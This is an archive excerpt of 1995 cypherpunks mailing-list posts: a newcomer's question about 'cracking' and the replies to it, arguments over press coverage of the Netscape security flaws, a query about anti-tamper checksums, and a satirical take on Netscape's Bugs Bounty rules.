comment on the state of the art in fast approximate character recognition ?
I expect that the people working on recognition of text in TV pictures etc.
would have a good idea. 

My lay computer scientist's guess is that it wouldn't be all that difficult to
pick a small sample window a couple of characters wide, and decide if the
contents were a couple of characters. Then you'd worry about testing for
higher-level linguistic intelligibility as a second cut. But I don't
really know.

A known-plaintext attack on the system would ideally include knowledge of the
typefaces, fonts etc. typically used to print documents at the source.... 

> exponentially 
> beyond that of a data encrypted document of similar key length and 
> algorithm strength. 

ObTheoretician:
Um, exponentially in terms of what ?  It sounds like this multiplies the
expected brute force cracking time by a constant, but doesn't change the
big-O time of the algorithm. I agree, however, that big constants can be
rather significant when it comes to real world applications.

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nesta Stubbs <nesta@cynico.com>
Date: Thu, 12 Oct 95 22:41:40 PDT
To: zoetrope@infinet.com
Subject: Re: 90%
In-Reply-To: <m0t3aMe-000KBGC@mail.infinet.com>
Message-ID: <Pine.BSD.3.91.951013003235.12157B-100000@miso.wwa.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 12 Oct 1995 zoetrope@infinet.com wrote:

> Can I ask a question....are you guys into cryptology for the interesting
> facts and knowledge or fer cracking unix codes and raising havoc?
> 
If you look on pg. 34 of the handbook, Sect. 97.A13 says that this list 
is primarily for passing child porn and dirty limericks in unbreakable 
codes.  You really should read your Internet Handbook before asking these 
questions.  You Internet Service Provider DID give you the Official 
Internet Handbook right?


Nesta Stubbs		     "Betsy, can you find the Pentagon for me? 
Cynico Network Consulting     It has five sides and a big parking lot" 
nesta@cynico.com			-Fred McMurray-





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Thu, 12 Oct 95 21:48:14 PDT
To: zoetrope@infinet.com
Subject: Welcome to the list
Message-ID: <9510130445.AA04028@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


You will probably find it most helpful to read through a few months
archives of the list (ask around for back digests, usenet access, etc).
And read the Tim's cyphernomicon.  You'll find most intro-level answers
there, and you're less likely to annoy the natives. :)
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 12 Oct 95 22:20:01 PDT
To: Mark <mark@lochard.com.au>
Subject: Re: NYT on Internet Flaws
In-Reply-To: <199510122235.AA41086@junkers.lochard.com.au>
Message-ID: <199510130518.BAA22989@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Mark writes:
> >It was suprisingly weak for a John Markoff story (he usually gets the
> >details exactly right) but it is an issue that had to be brought up
> >and I see no reason to call it a bad article overall.
> 
> *snort* I've been trying to keep my views to myself on this but claiming
> Markoff usually gets things right is plain misleading. His articles are as
> about as one sided as you can get and full of factual inaccuracies. The
> Mitnik series were a farce and his latest work is reactionary fluff and
> shows his true lack of understanding of his topics.

Pardon my saying it, but thats totally off base. Until this article, I
caught him in one failing -- he did not ask the state department for
comment when he did his story on Phil Karn's CJ and only reported the
pro-export viewpoint. When I wrote him about it, he sounded embarassed
that he hadn't said he would try to be more balanced next time. Other
than that, Markoff has been a paragon of journalistic integrity,
following the rules of the profession almost by the book.

Yeah, he was overinvolved in the Mitnik thing. Who among us is
perfect? Its not like he sought it out, anyway -- Mitnik involved him,
and who among us is rational enough to take ourselves off of
interesting work under such circumstances? He's as close as you are
going to get to meeting the journalistic ideal. You aren't going to
get perfect with mere human beings reporting the news. I'm willing to
settle for someone who gets the job right nearly all of the time.

Maybe he got lazy on this last article -- some of the stuff that made
it sound like NFS was used in wide area file transfer was really
strange -- but usually he gets *all* the details right. Who else
manages that? Can you name a better reporter? I can name five worse
ones covering the same beat right now without thinking about it.

Now, if he keeps being lazy I'll naturally change my opinion. Right
now, however, he's still up there in the pantheon in my book.


Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 12 Oct 95 22:33:04 PDT
To: zoetrope@infinet.com
Subject: Re: T-Shirts
In-Reply-To: <m0t3ZsP-000KBCC@mail.infinet.com>
Message-ID: <199510130532.BAA23011@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



zoetrope@infinet.com writes:
>         Ya but a multi million dollar corp like netscape should be paying
> big bucks for those bugs....Or the mob might...ya get my drift....Alot of
> people give personalized T-shirts but not everyone can jeapordize a corps
> existed?

If you are looking to make money off of this sort of thing, get a
reputation and start consulting or selling security software.  If your
interest is just in being obnoxious, please crawl back under your
rock. Either way, you are way out of line.

Oh, and you might want to learn how to spell and how to write in
standard English grammar if you want to be taken seriously.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 12 Oct 95 22:36:11 PDT
To: zoetrope@infinet.com
Subject: Re: 90%
In-Reply-To: <m0t3aMe-000KBGC@mail.infinet.com>
Message-ID: <199510130535.BAA23019@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



zoetrope@infinet.com writes:
> Can I ask a question....are you guys into cryptology for the interesting
> facts and knowledge or fer cracking unix codes and raising havoc?

I think I've figured it out.

I'm sure you'll be fine when you get past your 16th birthday, but
could you please leave us alone until then? Some of us have serious
work to do.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 12 Oct 95 23:01:16 PDT
To: zoetrope@infinet.com
Subject: Re: Flame Wars
In-Reply-To: <m0t3bS9-000K5HC@mail.infinet.com>
Message-ID: <199510130601.CAA23061@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



zoetrope@infinet.com writes:
>         I am sorry if I have annoyed or offended anyone here, It was not my
> intention of course......I dont want to hold any grudges especially with
> Sameer....I havent done much cracking and have alot of questions I bet alot
> of you had when you were 13 anyway zoetrope as in coppolla's
> studio....again sorry If I offended or annoyed you....

If you are actually 13, I apologize for the comments I made earlier.
However, if you are really are that young your questions are
understandable, as was your manner. I got started in computers when I
was about eleven many, many years ago, and I remember what its like
when you know more than most adults about technology but don't quite
know how to interact with other technical people yet. (I also remember
that I didn't appreciate people thinking that I didn't know how to
interact with other people, but thats another story.)

By the way, generally, it works better when you join a new mailing
list if you sit and listen for a while to get the flavor of what is
going on.

Anway, let me try to answer your question.

We don't study cryptography and data security for any one reason -- we
are a big and very diverse group of people and we have many different
reasons for what we do. However, many of us are interested in the
topic for political reasons. We view cryptography as a way to ensure
freedom and privacy for people around the world, and we try to advance
that cause by studying cryptographic systems and sometimes computer
security in general. Other reasons people like doing cryptography work
is that its a fun area of math/computer science to fool around with in
and of itself, and that some of us, including me, have paying work
doing things like computer and network security.

Most of us don't want to break in to computer systems for the sake of
breaking in to them, and in fact most of us don't even actually break
in to computers per se, but we do try to break badly designed
cryptographic software and security systems in order to get people to
build them better -- we tend to publicize these efforts both so that
we can get as many people working on them as possible (the more brains
the better) and so that we can make sure that people are aware of
flaws so that they will fix them or so that, if they aren't fixed,
people will avoid the software with the problems. "Security through
obscurity" is something we usually dislike around here, and you may
see the term "security through obscurity" used as a way of insulting
some cryptographic system or security sytem from time to time if it
depends on people not knowing how it works in order to keep it secure.

If you are interested in cryptography and in learning a bit about what
we do, I suggest that you first read a good introductory book on
cryptography like Bruce Schneier's "Applied Cryptography" (which is
coming out in a new edition in only a few weeks) and that you listen
a bit to the conversation around here -- you might also want to read
some of the back archives of the mailing list on www.hks.net.

You also might have other questions. One good way to deal with them is
to first see if you can find the answer in Schneier's book or the
archives, and then to try to ask the list if its a question that lots
of people might want to think about, or send mail to a single person
who probably knows the answer if you don't think its worth bothering
everyone about.

Above all, its important to remember that people around here are often
trying to get work done, and will answer quiet, polite questions
before they will answer loud and obnoxious ones.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Fri, 13 Oct 95 04:03:17 PDT
To: ecarp@netcom.com (Ed Carp)
Subject: Re: looking for anti-tamper software
In-Reply-To: <199510130455.VAA29233@netcom6.netcom.com>
Message-ID: <9510131100.AA17114@all.net>
MIME-Version: 1.0
Content-Type: text


> 
> I used to have this C source that I could embed in a program, and it
> would tell me if the software had been tampered with at runtime.  I've
> lost/mislaid/whatever the source, and I was wondering if anyone had anything
> that would do the same thing.  As I recall, it calculated a simple CRC and
> embedded it into the .EXE file (it was written for MS-DOS).
> 
> It doesn't need to be cryptographically secure - I just need to check to see
> if the executable has been corrupted.  I've leafed through alt.sources and
> comp.sources.*.

You are aware that there is a generic attack against all such defenses -
aren't you? It has been published for 7+ years.  For details see:

	A Short Course on Computer Viruses - Wiley and Sons - 94

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Fri, 13 Oct 95 04:14:19 PDT
To: cypherpunks@toad.com
Subject: NYT Markoff Article and one person's response
Message-ID: <9510131111.AA17607@all.net>
MIME-Version: 1.0
Content-Type: text


I sent the following letter to the editor of the NYT expressing my
personal view of the article.  Perhaps others on this list should send
letters expressing their viewpoints as well.

Dear Sir/Madam:

	I have been reading, with great interest, the responses from
security experts all over the Internet to John Markoff's October 11
article titled "Discovery of Internet Flaws Is Setback for On-Line
Trade", and I thought your readers might like to know what real experts
in the field think about Mr.  Markoff's article. 

	While the most recent announcement by Professor Brewer was
generally taken as a positive step from American academia in catching up
to the rest of the information security world, it is hardly a
breakthrough, or even a novelty. 

	To get a perspective on this, an average of about 10 new
vulnerabilities of this magnitude or larger are discussed on Internet
forums every month.  The "CERT" team at Carnegie-Mellon University
has published more than 10 similar types of attacks so far this year,
the Internet forum "8lgm" publishes an average of more than one per
month, the "BugTraq" Internet forum tracks and shows fixes for about
two similar holes per month, and the "cypherpunks" forum uncovers
several holes in cryptographic and other systems each month.

	The idea portrayed by Mr.  Markoff that businesses rushing to
the Internet are largely unaware of these risks is also quite naive.  A
recent Computer Security Institute study showed that one in every five
enterprises has reported suffering an Internet security incident.  Most
experts believe the reality is much worse and that many who responded
"no" either refuse to admit it or simply don't know.  Over 50 percent of
companies connected to the Internet provide high-risk features such as
FTP and WWW to all employees, and 39 percent have no firewall to limit
attacks from the Internet.  According to several published papers, about
10 times as many attempted attacks are detected when firewalls are in
place than are detected when they are not in place. 

	Since the Internet was first introduced, many of the American
Universities that have been so active in developing information
technology have essentially ignored the security issues.  Their
ignorance of these issues has produced literally hundreds of protocols
that are now in use by millions of computers from all over the globe and
which, because of their insecure designs, are inherently difficult to
secure. 

	Thousands of individuals from all over the world have spent
their spare time, often on nights and weekends, helping other people by
developing and freely distributing new security technologies.  They have
been finding security problems and solving them for many years, most
often without recognition or renumeration.  They have been trying to
tell the people developing these protocols about protection problems and
have been widely ignored, with a few notable exceptions, by the American
Universities. 

	I personally think that it is a travesty that a relatively minor
contribution by a few people at Berkeley gets front page headlines while
the ongoing contributions of thousands of volunteers goes largely
unrecognized.  If you want the real story about electronic commerce and
security issues on the Internet, listen to the people who are doing the
work every day. 

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an116512@anon.penet.fi
Date: Fri, 13 Oct 95 00:34:26 PDT
To: cypherpunks@toad.com
Subject: what are these people selling????
Message-ID: <9510130722.AA03096@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain


why is the cp meeting sponsored by sun?
so we can hear a sales pitch on java?
--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
Please, report inappropriate use to                abuse@anon.penet.fi
For information (incl. non-anon reply) write to    help@anon.penet.fi
If you have any problems, address them to          admin@anon.penet.fi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Fri, 13 Oct 95 07:38:52 PDT
To: Mark <mark@lochard.com.au>
Subject: Re: The Economist on Netscape "hackers"
In-Reply-To: <199510130705.AA35603@junkers.lochard.com.au>
Message-ID: <Pine.SOL.3.91.951013072726.26875B-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 13 Oct 1995, Mark wrote:
> 
> >Raph (who's wondering if there's something inherent in the media
> >process that keeps them from getting their stories straight)
> 
> Reporters. Editors. Owners.

Usually the Economist does take pains to get their facts right, and to 
print corrections if errors are reported. Recently they have been making 
a few more mistakes than they used to in their net coverage (most amusing 
mistake was making John Curran CTO of BBN instead of BBN Planet). 

They did come to the right conclusion on the payment standards issue, so 
they do deserve at least a B-.

Simon

----
(defun modexpt (x y n)  "computes (x^y) mod n"  
   (cond ((= y 0) 1) 	((= y 1) (mod x n))
	((evenp y) (mod (expt (modexpt x (/ y 2) n) 2) n))
	(t (mod (* x (modexpt x (1- y) n)) n))))






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ecarp@netcom.com (Ed Carp)
Date: Fri, 13 Oct 95 08:17:46 PDT
To: cypherpunks@toad.com
Subject: re: anti-tamper software
Message-ID: <199510131516.IAA10764@netcom15.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Thanks to all who replied to my request, although it seems I didn't quite
make it clear what I was looking for.

I'm not particularly interested in a strong cryptographic solution, as this
isn't intended to detect intentional tampering - just unintentional, such
as a bad spot on a hard drive or corruption.  Turns out that Simtel has
a couple of such packages in /SimTel/msdos/virus - CVIRPROT.ZIP is enough
protection, although STEALTH.ZIP looked intriguing...

I was, however, interested in what Fred Cohen said about there being a generic
attack against such methods when applied to software protection against viruses
(virii?).  Is there such a generic attack, besides the obvious of jumping around
the detection code?  How about encrypting the executable, adding loader and
decryption code, then decrypting the executable at runtime - would that defeat
such an attack, or all such defenses doomed to failure?
-- 
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Fri, 13 Oct 95 08:33:21 PDT
To: cypherpunks@toad.com
Subject: Re: 90%
Message-ID: <199510131533.IAA14463@desiree.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:01 PM 10/12/95 -0400, you wrote:
>Can I ask a question....are you guys into cryptology for the interesting
>facts and knowledge or fer cracking unix codes and raising havoc?

We are into cryptography because it holds the secrets, not to raising havoc,
but the eldrich gods who inspire it.  PGP is actually a plot by the Old
Ones(tm) to return to the earth to rule again.  Digital signatures are the
invocation to open the gate.  When the stars are near prime and the
algorythm is correct, the Old Ones(tm) will rise from the curves of space
and claim their place as the rulers of the TLAs.

Any other information you are not cleared for at this time.

(tm) is a trademark of Tim May and/or any tentacles he may designate.

|       Visualize a world without lawyers!        | alano@teleport.com   |
|"The moral PGP Diffie taught Zimmerman unites all| Disclaimer:          |
| mankind free in one-key-steganography-privacy!" | Ignore the man       |
|   -- PGP 2.6.2 key available on request --      |  behind the keyboard.|
|         http://www.teleport.com/~alano          |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Fri, 13 Oct 95 05:41:33 PDT
To: Mark <mark@lochard.com.au>
Subject: Re: The Economist on Netscape "hackers"
In-Reply-To: <199510130705.AA35603@junkers.lochard.com.au>
Message-ID: <Pine.3.89.9510130804.A15602-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Fri, 13 Oct 1995, Mark wrote:

> Hacker good. Cracker bad. Media distort hacker to bad. Media hype merchants.
> Media bad. Bad ol' Media. Degauss. Reformat.
> 
> >Raph (who's wondering if there's something inherent in the media
> >process that keeps them from getting their stories straight)
> 
> Reporters. Editors. Owners.
I'd say there's a nice market right now for people on this list to freelance
some accurate security and crypto articles out to the traditional media.
(accurate meaning your own personal bias)

While a nobody like me isn't going to get published in Time, I don't see 
why, oh, let's say a Kevin Kelly or a Steven Levy couldn't. Besides, there's
still an opening for all the rest of us to get published in the various 
computer trades and net mags. I'm positive *some* take freelancers.

If a lot of you get quoted and even interviewed in the bad ol' media,
and you actually care about getting the story right, why not write your 
own press releases and articles?

If you just managed the next netscape crack, release the crack and an 
export control critique together. You might even make some money out of it. 
In their rush to print, editors would rather have first hand info asap than 
their half-competent journalist's misunderstanding of it tomorrow. 

It's better than working for t-shirts. (Yes, I'm sure they're nice, Sameer)

If you want accurate press, you have to write it.
(Disclaimer: I am not now, nor have ever been a journalist, so I really 
don't have a lousy clue if I'm right)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Fri, 13 Oct 95 08:58:26 PDT
To: an116512@anon.penet.fi
Subject: Re: what are these people selling????
In-Reply-To: <9510130722.AA03096@anon.penet.fi>
Message-ID: <199510131552.IAA22648@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	The cp meeting is not "sponsored by sun". It is being held at
sun.  Did you think earlier cp meetings were spondored by sgi or
cygnus?

	What's wrong with hearing a sales pitch on java, anyway? 

> 
> why is the cp meeting sponsored by sun?
> so we can hear a sales pitch on java?
> --****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
> Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
> Please, report inappropriate use to                abuse@anon.penet.fi
> For information (incl. non-anon reply) write to    help@anon.penet.fi
> If you have any problems, address them to          admin@anon.penet.fi
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "J. R. Valverde (EMBL Outstation: the EBI)" <txomsy@ebi.ac.uk>
Date: Fri, 13 Oct 95 01:27:29 PDT
To: cypherpunks@toad.com
Subject: Re: T-Shirts
In-Reply-To: <199510130532.BAA23011@jekyll.piermont.com>
Message-ID: <199510130827.JAA17366@neptune.ebi.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


Hey Perry, I think this is pushing it a bit too far:

"Perry E. Metzger" <perry@piermont.com> writes
>zoetrope@infinet.com writes:
>>         Ya but a multi million dollar corp like netscape should be paying
>> big bucks for those bugs....Or the mob might...ya get my drift....Alot of
>> people give personalized T-shirts but not everyone can jeapordize a corps
>> existed?
>
>If you are looking to make money off of this sort of thing, get a
>reputation and start consulting or selling security software.  If your
>interest is just in being obnoxious, please crawl back under your
>rock. Either way, you are way out of line.
>
	Sorry, but I think the guy has a point. And all his rights to
expose it. Do you read sci.crypt? Looks like you don't. I've lost track
(nor do I try to keep it) of the amount of typical answers of the likes
of:
	> Can you break my algorithm?
	Yeah. Send the source and offer a good reward so someone thinks it
	worth breaking it.

	So far so good! And then someone comes asking why should anybody
do consultancy work for a multimillion corporation (e.g. MicroSoft) with
no access to sources for free or just a "high-quality T-shirt" that can't 
be worth more than 100$ and all he gets is a kick in the ass.

	Well, I agree that discovering the Pentium bug was great. But it
would have been better if it didn't exist. Many companies invest zillions
of dollars in testing. Why should I save that money to a greedy company?

	By the same rule, you may as well propose that we leave the Gov'ts
do as they wish with cryptography. Why should they try to make thing right
from the first time? Let people discover mistakes later, and complain. If
they can.

	The point is: regarding cryptography and security as with anything
else: one should be sure his/her solutions work before wasting other people's
time. Like, e.g. before asking if his ROT16 algorithm is safe. Isn't it
embarrassing that any corp. asks for testing of programs before even having
made sure they check for array overflows?

>Oh, and you might want to learn how to spell and how to write in
>standard English grammar if you want to be taken seriously.
>
	And that's the best part of all! Well, I'm not a native English
speaker. So may be I shouldn't be in this list. As neither any other
foreigner. More so since I think contents are more important thn the way
they are expressed.

	For that sake we could also give away crypto. It isn't reputable
and standard English, so it can't be taken seriously.

	I don't want to start a flame war. I'd just prefer to discuss
other topics, in any 'spaghetti -or scrambled- language' as long as I can 
understand it.

				jr
--
These opinions are mine and only mine. Hey, man, I saw them first!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark <mark@lochard.com.au>
Date: Thu, 12 Oct 95 17:12:24 PDT
To: perry@piermont.com
Subject: Re: NYT on Internet Flaws
In-Reply-To: <199510121454.KAA20694@jekyll.piermont.com>
Message-ID: <199510122235.AA41086@junkers.lochard.com.au>
MIME-Version: 1.0
Content-Type: text


>It was suprisingly weak for a John Markoff story (he usually gets the
>details exactly right) but it is an issue that had to be brought up
>and I see no reason to call it a bad article overall.

*snort* I've been trying to keep my views to myself on this but claiming
Markoff usually gets things right is plain misleading. His articles are as
about as one sided as you can get and full of factual inaccuracies. The
Mitnik series were a farce and his latest work is reactionary fluff and
shows his true lack of understanding of his topics.

The only value I find in his work is the humour value at laughing at the rot
on the pages. Unfortunately it really isnt a laughing matter to go around
creating incorrect impressions, especially about something with as much
potential as the inet.

Cheers,
Mark
mark@lochard.com.au
The above opinions are rumoured to be my own.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 13 Oct 95 06:44:07 PDT
To: cypherpunks@toad.com
Subject: FT on IT Standards
Message-ID: <199510131344.JAA16578@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The Financial times today has four-page insert on the
   complexity and difficulty of developing international
   standards for all types of products. There is a passing
   mention of the Internet security issue. An article on
   standards for IT confirms Perry's oft-made points about the
   slow pace, protracted angling for market share, and the by-
   pass of standards by market go-getters who foster messes.
   Here are quotes on the last point:

      Paul Callahan of Forrester Research: "When a company
      owns a market they can determine the pace -- a company
      in its early stages of domination can move the ball
      forward swiftly -- such as the Internet Web software
      provider Netscape. Netscape didn't spend a lot of time
      with standards bodies -- it simply joined forces with
      MasterCard to co-develop Secure Courier, much as
      Microsoft enrolled Visa to develop its STT, Secure
      Transaction Technology. Only afterwards are the
      overtures made to standards bodies. That's commerce, and
      it's the way things are in the real world."

      Henry Ryan, convenor of the Iso-IEC JTC1 ad hoc working
      group on GII: "People ask, 'Can you afford to wait for
      standards?' I'd turn it round. If you don't, you suffer
      in the long term and end up with an unholy mess. If
      people do their own thing then the benefits -- and the
      problems -- may not be concentrated in one sector of the
      industry. We're finding that with the convergence of
      technologies, such as the superhighway, it isn't enough
      to develop standards for the IT sector, 
telecommunications,
      or consumer electronics individually."














From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Fri, 13 Oct 95 09:48:48 PDT
To: cypherpunks@toad.com
Subject: Bugs Bounty?? ... shhh ... I'm huntin wa'bits ...
Message-ID: <199510131647.JAA17906@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


> Netscape Announces Bugs Bounty with release of Netscape Navigator 2.0 beta
> 
> Program harnesses power of the Internet to help Netscape refine Beta  
> versions and ensure highest quality software.

Or at least this was the headline on the announcement from 
                http://www.netscape.com 

> MOUNTAIN VIEW, Calif. (October 10, 1995) -- Netscape Communications
> Corporation (NASDAQ:  NSCP) today  introduced the "Netscape Bugs 
> Bounty", a program that rewards users who help Netscape find and report 
> "bugs" in the beta versions of its recently announced Netscape 
> Navigator 2.0 software.
> The beta versions of the popular network navigation software are available
> today for downloading on the Internet for free evaluation.

I was immediately overjoyed when I read that first paragraph.  The sheer
delight and mention of rewards -- whether its frequent flyer points or
just simple little gold stars and pats on the head -- motivates me to just
go out and do it.  Go out and do whatever the offeror needs, so I can
collect my nice juicy reward.  A win/win situation.  But something about
this announcement seemed a little "too" polished ... (maybe it's just
seeing how the last "Netscape bug situation" was spinned, ... I don't
know). 

But I decided to read on, wanting to find out how Netscape "rewards" users
who bring them "bad news".  It was a slow afternoon, and I had just
finished listening to that odious Dominick Dunne on Larry King.  What the
hey, I thought. 

Let's read on and discover more about the Bounty from Netscape. 

> The contest begins with the beta versions of Netscape Navigator 2.0 --
> available for Windows, Macintosh and X Window System operating environments
> -- that are on the Internet today.  FULL RULES FOR THE CONTEST will be
> available on Netscape's home page at http://home.netscape.com.  As the
> rules will explain in detail, users who are the first to report a
> particular bug will be rewarded with various prizes depending on the bug
> class:  users reporting significant security bugs as judged by Netscape
> will collect a cash prize;  users finding any security
> bugs will win Netscape merchandise;  and users finding other serious bugs
> will be eligible to win a choice of items from the Netscape General Store.

Gee this was sounding, really really good.  But that FULL RULES thing was
highlighted on my screen (I was running Lynx 2.2 at the time ...), so I
had a quick little old jump over to the FULL RULES.  And with just a <cr>
I was off ... and rule-reading before the big hunt ... 

The rules started off ... 

> We're in the process of building a series of new technologies, such
> as Java, into Netscape Navigator 2.0. Navigator 2.0 will usher in a new
> way to use computers and networks, as well as create new opportunities
> for people to build applications.

Wow, I said.  New opportunites to build applications ;) New ways to use
computers.  New ways to use networks.  All ushered in by Netscape.  That
all sounds really, really GOOD!! 

I was eager, and ready for all of this newness. 

> We're eager to make sure that our new product is as bug-free as possible.
> To that end, in addition to our internal testing, we're now offering prizes
> and bounties for certain types of bugs found in the beta versions of
> Navigator 2.0 starting with the beta versions listed at the bottom of 
> the page.

Oh good.  Finally a company that's interested in making a product as bug
free as possible.  And Prizes and Bounties!!!  Joy!!  Joy!! 

My adrenaline began to flood.  Every neuron was piqued.  I was ready to
read on.  This was slowly turning into as satisfying a hunt as any one I'd
ever been on, even though we were only hunting for little old Bugs, and
not big cats.  None the less, it sounded like a fine afternoon of sport. 
Especially after Dominick Dunne. 

> This contest begins on October 11 and ends when Navigator 2.0 ships
> release versions on supported Macintosh, Windows, and Unix platforms. 
> If the release date for the final version varies by platform, then the 
> contest will continue until Netscape has released final versions of 
> Netscape Navigator 2.0 on all 3 platforms.
> 
> For questions regarding this contest email "contest_questions@netscape.com"
> All questions and notifications will be handled via email. Netscape may
> choose to respond to your questions individually, or as part of a 
> generalized response. Netscape will strive to respond as fully as 
> possible, but can not guarantee a response to all questions we receive.

Hmmm, I thought.  This is odd. 

Here I am potentially reporting a very important problem, to Netscape, and
the company is saying that they might not even choose to respond to
questions.  

I began to wonder whether Ford could have ever gotten away with not
responding to queries about their products.  Especially defects.  I
wondered what would have been the reaction if Ford decided not to answer
mail that inquired about the wee little problem with their Pinto's. 

But this was a different industry.  This was software.  Internet software. 
The hottest, sportiest, new-fangleddy dandiest stuff around. 

Not responding to mail, but of course!!  They're busily harnassing the
power of the Internet to deliver software that's bug-free.  They can't be
bothered with small things like customers.  They want bounty-hunters. 

But no need to let the glow fade so fast.  I'm sure that they'll just be
swamped with mail ... now let's get to their "proactive reward program"  

(although I don't know how you reconcile running a contest to improve your
product with ignoring mail ... must be some newfangled modern hip-hop
do-op bee-bop communications graduate theory thingy, that I just don't
quite know how to parse.)

> Anyone who finds a severe bug (as defined by us) that hasn't been
> previously found and can be reproduced by us will be entered in drawings
> for prizes from our GENERAL STORE.

Hmmm, a severe bug (as defined by them).  Is this like a Level One??  I
wonder what that would be.  

But let's get to the meat of the matter, what are the prizes that Netscape
is offering to harness the power of the Internet while they ignore and
don't (selectively) reply to email. 

> Netscape will conduct 2 drawings and will award 50 prizes in each drawing,
> for a total of 100 prizes. 50 will be nifty Netscape Mozilla mugs and 50
> will be snazzy Netscape polo shirts. We'll award either a mug or a shirt,
> our choice, to the submitters of each of 100 bugs drawn randomly.

<cough> ... 'scuse me ... a nifty Netscape Mozilla mug??  50 of them do
you say?? 

Let's, see.  Last time I checked a single share of Netscape Communications
Corporation (NASDAQ:  NSCP) was trading for about $60 plus change.  I
calculated the wholesale cost of the mugs at approximately $1.20 each,
which would bring the total mug promotion budget (50 * $1.20) to the
equivalent of one single share of NSCP. 

Gee, that certainly motivates me.

But then again, there's those snazzy Netscape polo shirts. ;-)

Shame that Netscape isn't Microsoft.  I'm sure that other vendors might 
at least offer the Great Powerful Internet Bugs Hunters.a choice between the
snazzy shirt or the nifty mug?  But I guess most of the shirts and mugs 
weren't reserved for the Bugs Hunters.  They were probably in de press kits.

> We'll conduct the first drawing when we ship Beta 2 for all platforms 
> and the second drawing when we release the final version of Netscape 
> Navigator 2.0.
>
> If you find a Security bug that hasn't been previously found, and can 
> be reproduced by us, we'll contact you via email and offer you your choice 
> of any item in the Navigator products or Bazaar section of our General 
> Store.

Wow, I thought.

I was stupified.  If I found one of the Security bugs, I could get a copy
of one of the Buggy Products absolutely FREE!!!  Gratis!!  What man could
turn his nose up at that kind of offer. 

This lil old rest-stop cum cafe, the one that's putting out the bounty
offers on the info-highway ain't like no little greasy spoon where you
stop for chile and then get CHARGED when you find a cockroach on your
spoon staring you down eye to eye. 

Heck no, this is a CLASS operation.  

Dinner's on the house.

> And if the security bug you find is severe as defined by Netscape, and 
> hasn't been previously found, and can be reproduced by us, we'll write 
> you a check for $1000.

Now we're really talking ...If you find a really, really severe bad
problem, we'll reward you with the equivalent of 16.5 shares of Netscape. 
A veritable REWARD OF REWARDS!! 

> No purchase is necessary. All entries become the property of Netscape,
> and may be modified, revised, edited, incorporated into Netscape products
> and otherwise used at Netscape's sole discretion.

Oh, oh ... incorporated into Netscape products???

This is sort of a non-consensual waiver of all of your rights by
participating in this contest??  Now this made me want to stop and
cogitate for a lil bit. 

I thought ...(but only for a second, of course, cause there were bugs to
